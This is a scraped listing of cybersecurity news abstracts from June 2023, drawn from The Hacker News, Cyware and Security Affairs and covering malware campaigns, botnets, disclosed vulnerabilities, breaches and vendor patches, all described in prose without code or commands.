Abstract The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus. To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition." BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. A UEFI bootkit capable of bypassing Windows Secure Boot protections, samples of the malware have since emerged in the wild. This is accomplished by taking advantage of a known Windows flaw called Baton Drop (CVE-2022-21894, CVSS score: 4.4) discovered in vulnerable boot loaders not added into the Secure Boot DBX revocation list. The vulnerability was addressed by Microsoft in January 2022. This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable v

The Hacker News

June 23, 2023 – Government

Federal incentives could help utilities overcome major cybersecurity hurdle: money Full Text

Abstract A new cyber incentive framework from the Federal Energy Regulatory Commission could help utilities adapt to new threats at a faster pace, by providing flexibility for them to invest in pre-qualified cybersecurity measures.

Cyware

June 23, 2023 – Cryptocurrency

New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices Full Text

Abstract Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said. "The backdoor also installs a patched version of OpenSSH on affected devices, allowing threat actors to hijack SSH credentials, move laterally within the network, and conceal malicious SSH connections." To pull off the scheme, misconfigured Linux hosts are brute-forced to gain initial access, following which the threat actors move to disable shell history and fetch a trojanized version of OpenSSH from a remote server. The rogue OpenSSH package is configured to install and launch the backdoor, a shell script that allows the attackers to distribute additional payloads a

The Hacker News

June 23, 2023 – Policy and Law

Data Breach Lawsuit Alleges Mismanagement of 3rd-Party Risk Full Text

Abstract A proposed federal class action lawsuit alleges that patient debt collection software firm Intellihartx was negligent in its handling of third-party risk, contributing to a breach affecting nearly 490,000 individuals.

Cyware

June 23, 2023 – Vulnerabilities

More than a million GitHub repositories potentially vulnerable to RepoJacking Full Text

Abstract Researchers reported that millions of GitHub repositories are likely vulnerable to an attack called RepoJacking. A study conducted by Aqua researchers revealed that millions of GitHub repositories are potentially vulnerable to RepoJacking. In...

Security Affairs

June 22, 2023 – Vulnerabilities

GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking Full Text

Abstract RepoJacking is a security vulnerability that may lead to code execution on organizations' internal or customer environments. Millions of GitHub repositories are potentially vulnerable to it, including popular organizations such as Google and Lyft.

Cyware

June 22, 2023 – Phishing

MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans Full Text

Abstract A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems. "The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said. "Both are used for command-and-control during different stages of the infection chain." The multi-stage attack chain commences when an email recipient clicks the embedded link pointing to a password-protected ZIP file ("REQUEST.zip") hosted on Microsoft OneDrive with the password "12345." Extracting the archive file reveals a heavily obfuscated JavaScript file ("REQUEST.js") that, when double clicked, activates the infection by executing two PowerShell commands that are responsible for retrieving two separate payloads from OneDri

The Hacker News

June 22, 2023 – Malware

Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text

Abstract The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.

Cyware

June 22, 2023 – Education

Generative-AI apps & ChatGPT: Potential risks and mitigation strategies Full Text

Abstract Losing sleep over Generative-AI apps? You're not alone or wrong. According to the Astrix Security Research Group, mid size organizations already have, on average, 54 Generative-AI integrations to core systems like Slack, GitHub and Google Workspace and this number is only expected to grow. Continue reading to understand the potential risks and how to minimize them. Book a Generative-AI Discovery session with Astrix Security's experts (free - no strings attached - agentless & zero friction) "Hey ChatGPT, review and optimize our source code" "Hey Jasper.ai, generate a summary email of all our net new customers from this quarter" "Hey Otter.ai, summarize our Zoom board meeting" In this era of financial turmoil, businesses and employees alike are constantly looking for tools to automate work processes and increase efficiency and productivity by connecting third party apps to core business systems such as Google workspace, Slack and GitHub

The Hacker News

June 22, 2023 – Botnet

New Mirai botnet targets tens of flaws in popular IoT devices Full Text

Abstract Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai...

Security Affairs

June 22, 2023 – Breach

Third-Party Vendor Exposes 3CX Data via Unsecured Elasticsearch and Kibana Instances Full Text

Abstract A third-party vendor of 3CX left an open server and exposed sensitive data. Attackers could use the exposed call metadata, license keys, and database connection strings to spy on 3CX clients or launch more sophisticated attacks.

Cyware

June 22, 2023 – General

Alert: Million of GitHub Repositories Likely Vulnerable to RepoJacking Attack Full Text

Abstract Millions of software repositories on GitHub are likely vulnerable to an attack called RepoJacking, a new study has revealed. This includes repositories from organizations such as Google, Lyft, and several others, Massachusetts-based cloud-native security firm Aqua said in a Wednesday report. The supply chain vulnerability, also known as dependency repository hijacking, is a class of attacks that makes it possible to take over retired organization or user names and publish trojanized versions of repositories to run malicious code. "When a repository owner changes their username, a link is created between the old name and the new name for anyone who downloads dependencies from the old repository," researchers Ilay Goldman and Yakir Kadkoda said. "However, it is possible for anyone to create the old username and break this link." Alternatively, a similar scenario could arise when a repository ownership is transferred to another user and the original account

The Hacker News

June 22, 2023 – Malware

Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text

Abstract The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability,...

Security Affairs

June 22, 2023 – General

British law firms warned to upgrade cyber defenses against ransomware attacks Full Text

Abstract Law firms in Britain were warned on Thursday to upgrade their cyber defenses in the wake of a number of ransomware attacks that led to sensitive and potentially legally privileged information being stolen by criminals and published online.

Cyware

June 22, 2023 – Hacker

Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware Full Text

Abstract The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare institu

The Hacker News

June 22, 2023 – Breach

Norton parent firm Gen Digital, was victim of a MOVEit ransomware attack too Full Text

Abstract Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that...

Security Affairs

June 22, 2023 – Cryptocurrency

Ukrainian Police Disrupt Cryptocurrency Scam Aimed at Canada Full Text

Abstract Ukrainian and Canadian authorities conducted a joint operation to disrupt the two call centers and confiscate computer equipment, mobile phones, SIM cards, cars, and cash.

Cyware

June 22, 2023 – Education

Unveiling the Unseen: Identifying Data Exfiltration with Machine Learning Full Text

Abstract Why Data Exfiltration Detection is Paramount? The world is witnessing an exponential rise in ransomware and data theft employed to extort companies. At the same time, the industry faces numerous critical vulnerabilities in database software and company websites. This evolution paints a dire picture of data exposure and exfiltration that every security leader and team is grappling with. This article highlights this challenge and expounds on the benefits that Machine Learning algorithms and Network Detection & Response (NDR) approaches bring to the table. Data exfiltration often serves as the final act of a cyberattack, making it the last window of opportunity to detect the breach before the data is made public or is used for other sinister activities, such as espionage. However, data leakage isn't only an aftermath of cyberattacks, it can also be a consequence of human error. While prevention of data exfiltration through security controls is ideal, the escalating complexity a

The Hacker News

June 22, 2023 – Vulnerabilities

Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari Full Text

Abstract Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited...

Security Affairs

June 22, 2023 – Hacker

Russian hacking group puts fresh emphasis on stealing credentials Full Text

Abstract These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries.

Cyware

June 22, 2023 – Vulnerabilities

Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites Full Text

Abstract A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. "This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met," Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system. It impacts all versions of the plugin, including and prior to versions 5.14.2. The problem, at its core, is a case of authentication bypass that arises as a result of insufficient encryption protections that are applied when customers are notified when they have abandoned their shopping carts on e-commerce sites without completing the purchase. Specifically, the encryption key is hard-coded in the plugin, thereby allowing

The Hacker News

June 22, 2023 – Malware

Analyzing the TriangleDB implant used in Operation Triangulation Full Text

Abstract Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...

Security Affairs

June 22, 2023 – Outage

Hawaiʻi Community College Hit with NoEscape Ransomware Attack Full Text

Abstract Hawaiʻi Community College is the latest university to deal with a ransomware attack, announcing on Tuesday night that it was forced to shut off its network and contact federal authorities about the incident.

Cyware

June 22, 2023 – Vulnerabilities

Zero-Day Alert: Apple Releases Patches for Actively Exploited Flaws in iOS, macOS, and Safari Full Text

Abstract Apple on Wednesday released a slew of updates for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild. This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called Operation Triangulation that has been active since 2019. The exact threat actor behind the activity is not known. CVE-2023-32434 - An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges. CVE-2023-32435 - A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content. The iPhone maker said it's aware that the two issues "may have been actively exploited against versions of iOS released before iOS 15.7," crediting Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin for reporting them. The advisory comes as the Russia

The Hacker News

June 22, 2023 – General

CISOs’ New Stressors Brought on by Digitalization: Report Full Text

Abstract Salt Security surveyed an international selection of 300 CISOs and CSOs to examine the cybersecurity ramifications of digitalization – and it is worth noting that almost 90% of them said that digital transformation introduces unforeseen risks.

Cyware

June 22, 2023 – Malware

RDStealer Compromises Remote Desktop Drives for Data Theft Full Text

Abstract Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. Not a coincidence but all the compromised machines were Dell-manufactured devices.

Cyware

June 21, 2023 – Hacker

ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks Full Text

Abstract The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previous undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT, although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file --

The Hacker News

June 21, 2023 – APT

Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text

Abstract Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...

Security Affairs

June 21, 2023 – Vulnerabilities

Critical WordPress Plugin Vulnerabilities Impact Thousands of Sites Full Text

Abstract The first security defect, tracked as CVE-2023-2986 (CVSS score 9.8/10), impacts the Abandoned Cart Lite for WooCommerce, a plugin that notifies customers who did not complete the purchase process, and which has more than 30,000 active installations.

Cyware

June 21, 2023 – Malware

New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text

Abstract More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB. "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation Triangulation

The Hacker News

June 21, 2023 – Botnet

New Condi DDoS botnet targets TP-Link Wi-Fi routers Full Text

Abstract Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability...

Security Affairs

June 21, 2023 – Ransomware

May ransomware activity rises behind 8base, LockBit gangs Full Text

Abstract LockBit was the most active group last month, but NCC Group researchers were surprised by 8base, which started listing victims from attacks that occurred beginning in April 2022.

Cyware

June 21, 2023 – Education

Startup Security Tactics: Friction Surveys Full Text

Abstract When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta's information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I'm going to focus on number three: reducing friction. Declaring your intentions There is value in making "reducing friction" an explicit goal of your security program. It sets the right tone with your counterparts across the organization, and is one step toward building a positive security culture. The first time I presented those outcomes in a company-wide forum, I received a Slack message from a senior leader who had just joined the company: "fantastic to hear about the security's teams focus on removing invisible security controls. Excellent philosophy for the security team [...] its just awesome too many security teams vi

The Hacker News

June 21, 2023 – Vulnerabilities

Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild Full Text

Abstract VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (Formerly...

Security Affairs

June 21, 2023 – General

US and European IT decision-makers have different cloud security priorities Full Text

Abstract The growing adoption of cloud has elevated cloud security fear for IT teams, as they grapple with the challenges and concerns arising from the widespread use of complex cloud environments while diligently addressing them, according to SUSE.

Cyware

June 21, 2023 – Vulnerabilities

Critical ‘nOAuth’ Flaw in Microsoft Azure AD Enabled Complete Account Takeover Full Text

Abstract A security shortcoming in Microsoft Azure Active Directory (AD) Open Authorization (OAuth) process could have been exploited to achieve full account takeover, researchers said. California-based identity and access management service Descope, which discovered and reported the issue in April 2023, dubbed it nOAuth. "nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications," Omer Cohen, chief security officer at Descope, said. The misconfiguration has to do with how a malicious actor can modify email attributes under "Contact Information" in the Azure AD account and exploit the "Log in with Microsoft" feature to hijack a victim account. To pull off the attack, all an adversary has to do is to create and access an Azure AD admin account and modify their email address to that of a victim and take advantage of the single sign-on scheme on a vulnerable app or website. "If the app merges u

The Hacker News

June 21, 2023 – Government

New DOJ unit will focus on prosecuting nation-state cybercrime Full Text

Abstract The decision to put cyber on equal footing with the division’s three existing sections comes as the DOJ has ramped up its own efforts to defeat botnets, contain or eliminate malware outbreaks and pursue digital criminals around the globe.

Cyware

June 21, 2023 – Hacker

Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor Full Text

Abstract Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in an European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group tha

The Hacker News

June 21, 2023 – General

Organizations actively embrace zero trust, integration remains a hurdle Full Text

Abstract IT teams have made security efforts and progress in zero-trust implementation strategies to establish a new sense of normalcy following the network upheaval caused by the start of the global pandemic.

Cyware

June 21, 2023 – Malware

New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text

Abstract A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot the

The Hacker News

June 21, 2023 – Botnet

Tsunami Botnet Found Targeting Unsecured Linux SSH Servers Full Text

Abstract An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available.

Cyware

June 21, 2023 – Vulnerabilities

Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations Networks Full Text

Abstract VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887, could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware Aria Operations Networks versions 6.x, with fixes released in versions 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9, and 6.10 on June 7, 2023. Now according to an update shared by the virtualization services provider on June 20, 2023, the flaw has been weaponized in real-world attacks, although the exact specifics are unknown as yet. "VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild," the company noted. Data gathered by threat intelligence firm GreyNoise shows active exploitation of the flaw from two different IP addresses located in the Netherl

The Hacker News

June 20, 2023 – Vulnerabilities

OT:Icefall: Vulnerabilities Identified in Wago Controllers Full Text

Abstract The flaws were identified as part of the OT:Icefall research that has led to the public disclosure of 61 vulnerabilities impacting more than 100 OT products from 13 vendors.

Cyware

June 20, 2023 – Vulnerabilities

Researchers Expose New Severe Flaws in Wago and Schneider Electric OT Products Full Text

Abstract Three security vulnerabilities have been disclosed in operational technology (OT) products from Wago and Schneider Electric. The flaws, per Forescout, are part of a broader set of shortcomings collectively called OT:ICEFALL, which now comprises a total of 61 issues spanning 13 different vendors. "OT:ICEFALL demonstrates the need for tighter scrutiny of, and improvements to, processes related to secure design, patching and testing in OT device vendors," the company said in a report shared with The Hacker News. The most severe of the flaws is CVE-2022-46680 (CVSS score: 8.8), which concerns the plaintext transmission of credentials in the ION/TCP protocol used by power meters from Schneider Electric. Successful exploitation of the bug could enable threat actors to gain control of vulnerable devices. It's worth noting that CVE-2022-46680 is one among the 56 flaws originally unearthed by Forescout in June 2022. The other two new security holes (CVE-2023

The Hacker News

June 20, 2023 – Breach

3CX data exposed, third-party to blame Full Text

Abstract A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data. The issue went under the company’s radar, even though it was recently targeted by North Korean hackers. While...

Security Affairs

June 20, 2023 – Denial Of Service

Compromised Linux SSH servers engage in DDoS attacks, cryptomining Full Text

Abstract A threat actor is mounting dictionary attacks to log into Linux servers with SSH installed and saddle the server with the Tsunami and ShellBot DDoS bots, the XMRig CoinMiner program, and Log Cleaner – a tool for deleting and modifying logs.

Cyware

June 20, 2023 – Vulnerabilities

Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices Full Text

Abstract Zyxel has rolled out security updates to address a critical security flaw in its network-attached storage (NAS) devices that could result in the execution of arbitrary commands on affected systems. Tracked as CVE-2023-27992 (CVSS score: 9.8), the issue has been described as a pre-authentication command injection vulnerability. "The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request," Zyxel said in an advisory published today. Andrej Zaujec, NCSC-FI, and Maxim Suslov have been credited with discovering and reporting the flaw. The following versions are impacted by CVE-2023-27992 - NAS326 (V5.21(AAZF.13)C0 and earlier, patched in V5.21(AAZF.14)C0), NAS540 (V5.21(AATB.10)C0 and earlier, patched in V5.21(AATB.11)C0), and NAS542 (V5.21(ABAG.10)C0 and earlier, patched in V5.21(ABAG.11)C0) The alert comes two weeks

The Hacker News

June 20, 2023 – Botnet

New Tsunami botnet targets Linux SSH servers Full Text

Abstract Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected...

Security Affairs

June 20, 2023 – Phishing

Phishing scam takes $950k from DoorDash drivers Full Text

Abstract The scam involved placing bogus orders, contacting drivers claiming to be from the DoorDash support team, and convincing them to hand over banking details or log in to a fake portal.

Cyware

June 20, 2023 – Solution

SaaS in the Real World: How Global Food Chains Can Secure Their Digital Dish Full Text

Abstract The Quick Serve Restaurant (QSR) industry is built on consistency and shared resources. National chains like McDonald's and regional ones like Cracker Barrel grow faster by reusing the same business model, decor, and menu, with little change from one location to the next.  QSR technology stacks mirror the consistency of the front end of each store. Despite each franchise being independently owned and operated, they share subscriptions to SaaS applications, or use multiple tenants of the same application. Each app is typically segmented by store. Corporate IT and Security has access to the entire database, while each franchise has visibility into its own data.  These SaaS apps cover everything from CRMs to supply chains to marketing and HR. The data within is used to understand consumer habits, improve marketing campaigns, and manage employees. Like every other industry, QSR SaaS apps contain a wealth of data that needs to be secured.  At the same time, we're seeing food cha

The Hacker News

June 20, 2023 – Vulnerabilities

Zyxel addressed critical flaw CVE-2023-27992 in NAS Devices Full Text

Abstract Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices. Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting...

Security Affairs

June 20, 2023 – Malware

Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text

Abstract Virustotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).

Cyware

June 20, 2023 – Attack

Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer Full Text

Abstract A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called  RDStealer . "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie  said  in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in question

The Hacker News

June 20, 2023 – Solution

Tackling Data Sovereignty with DDR Full Text

Abstract Data-centric distributed resilience (DDR) offers a compelling approach to addressing data sovereignty in cybersecurity. As much of our modern life relies upon the cloud, the question of data protection is front of mind for many organizations. Those...

Security Affairs

June 20, 2023 – Vulnerabilities

Western Digital Blocks Unpatched Devices From Cloud Services Full Text

Abstract The move, which began on June 15, comes one month after the company released firmware updates for its My Cloud product line to address multiple security defects, including a critical path traversal bug that leads to remote code execution (RCE).

Cyware

June 20, 2023 – Vulnerabilities

ASUS Releases Patches to Fix Critical Security Bugs Impacting Multiple Router Models Full Text

Abstract Taiwanese company ASUS on Monday released firmware updates to address, among other issues, nine security bugs impacting a wide range of router models. Of the nine security flaws, two are rated Critical and six are rated High in severity. One vulnerability is currently awaiting analysis. The list of impacted products is GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. Topping the list of fixes are CVE-2018-1160 and CVE-2022-26376, both of which are rated 9.8 out of a maximum of 10 on the CVSS scoring system. CVE-2018-1160 concerns a nearly five-year-old out-of-bounds write bug in Netatalk versions before 3.1.12 that could allow a remote unauthenticated attacker to achieve arbitrary code execution. CVE-2022-26376 has been described as a memory corruption vulnerability in the Asuswrt firmware that could be triggered by mean

The Hacker News

June 20, 2023 – Vulnerabilities

ASUS addressed critical flaws in some router models Full Text

Abstract ASUS addressed critical vulnerabilities in multiple router models, urging customers to immediately install firmware updates. ASUS is warning customers to update some router models to the latest firmware to address critical vulnerabilities. The...

Security Affairs

June 20, 2023 – Government

Federal Authority Warns Health Sector of TimisoaraHackerTeam Threats Full Text

Abstract Federal authorities are warning the healthcare sector of an apparent resurgence of TimisoaraHackerTeam threats after a recent attack by the "obscure" ransomware group on a U.S. cancer center.

Cyware

June 20, 2023 – Breach

Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces Full Text

Abstract Over 101,100 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News. "The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company  said . "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year." Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh. A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info steal

The Hacker News

June 20, 2023 – Malware

Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text

Abstract Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as  DoNot Team , which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company  said . DoNot Team  is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure to

The Hacker News

June 19, 2023 – Outage

Anonymous Sudan and Killnet strike again, target EIB Full Text

Abstract The EIB's main site is currently down, and the bank has just released a Tweet acknowledging the issue as a 'cyber attack.' The EIB interconnection infrastructure has been allegedly disrupted.

Cyware

June 19, 2023 – Malware

New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text

Abstract A new information-stealing malware called  Mystic Stealer  has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants,"  InQuest  and  Zscaler  researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 co

The Hacker News

June 19, 2023 – Malware

Experts found components of a complex toolkit employed in macOS attacks Full Text

Abstract Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...

Security Affairs

June 19, 2023 – Malware

DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text

Abstract The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, file stealing, credential theft, and ransomware.

Cyware

June 19, 2023 – Malware

Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text

